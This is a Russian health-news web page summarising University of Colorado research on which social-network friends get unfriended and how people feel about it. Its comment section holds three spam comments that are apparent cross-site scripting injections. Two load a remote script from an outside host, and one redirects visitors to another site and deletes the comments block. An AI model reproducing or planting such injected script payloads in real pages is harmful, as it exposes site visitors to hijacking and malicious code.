Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Ученые выяснили, что случ...  >>  Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!
 
Обратная связь
 

Ученые выяснили, что случится с вами, если вас удалят из друзей Вконтакте!

Размер шрифта
07 ноября 2016 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, ученые уже давно изучают наше поведение в социальных сетях! Два исследования, проведенных в Университете Колорадо, смогли выявить те типы людей, которых чаще всего удаляют из друзей в контакте и фейсбуке, а также то, какие эмоции они испытывают в этот момент.

Две работы, опубликованные в этом году, показали, что чаще всего мы удаляем из друзей тех, с кем познакомились в школьные годы. «Чаще всего причиной удаления из друзей служит то, что человек опубликовал в комментарии свое мнение о политике или религии, которое не совпадает с взглядами хозяина страницы», – рассказывает Кристофер Сибона, докторант компьютерных наук из Денвера. «Другой важной причиной отказа от виртуальной дружбы были частые и неинтересные посты в новостной ленте».

Сибона сначала определил стратегии дружеского поведения в социальных сетях, а на втором этапе работы изучил эмоциональную реакцию участников. В обоих исследованиях приняли участие 1 077 человек. Полученные данные позволили составить список, который отражает частоту удаления определенных типов людей из списка друзей. Итак, наиболее часто были удалены:

  • школьные друзья,
  • друзья друзей,
  • коллеги по работе,
  • друзья по общим интересам.

«Мы выяснили, что своих коллег люди чаще удаляли из друзей за их поступки в реальном мире, чем за поведение в соцсетях», – отмечает Сибона. Он считает, что школьные друзья так часто оказываются в списке удаленных по причине того, что их политические и религиозные убеждения в молодости еще не были особенно сильны. Однако со временем они стали более явными, что может легко задеть людей с противоположными взглядами. «Ваши школьные друзья могут не знать ваших текущих убеждений», – говорит Сибона. «А в социальных сетях такое несогласие очень быстро перерастает в спор».

Вторая часть исследования была посвящена изучению эмоциональной реакции на удаление из друзей в соцсетях. Ученым удалось обнаружить целый спектр различных реакций, наиболее частыми из которых были: 

  • это меня удивило,
  • это меня обеспокоило,
  • я был ошеломлен,
  • я был расстроен из-за этого.

«В наибольшей степени реакция зависела от того, насколько близкими были отношения между людьми до удаления из друзей», – объясняет Сибона, который изучает психологические последствия действий в социальных сетях с 2010 года. «Вы, разумеется, будете очень обеспокоены и расстроены, если вас удалит из списка друзей ваш лучший друг». Если же трудности в общении между двумя друзьями были заметны ранее, то эмоциональная реакция на действия в соцсети была гораздо менее сильной. Также исследование показало, что чаще всего из друзей удаляют тех, кто когда-то был близок, чем просто приятелей или дальних знакомых.

«В мире социальных сетей очевидно преобладание слабых и малозначимых дружеских связей», – отмечает Кристофер Сибона. «Если у вас много друзей в сети, поддерживать такие отношения довольно легко», – добавляет он. «Но если вы приняли окончательное решение нажать кнопку и избавиться от кого-то, помните – это может причинить ему боль».

В наш век глобального интернета и множества социальных сетей, в которых происходит общение, такие исследования очень важны, ведь они помогают понять закономерности нашего поведения в сети.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:30

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:25

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

4 - lazarewacarolina

03 августа 2015 в 11:14

Цитировать   |   Пожаловаться

Интересно, но меня в ступор поставил список людей, которые чаще всего удаляют, кто тогда кроме родственников остается...

Статьи

       
1 зашел – 1 вышел! Как «дружат» люди в социальных сетях   Как социальные сети разрушают ваши отношения   К врачу – в два клика!   Как далеко искать любовь? Ученые говорят, что отношения на расстоянии лучше обычных!  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Странные сигналы вашего организма
Как снова хотеть секса
Проблемы с внешностью или болезнь?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.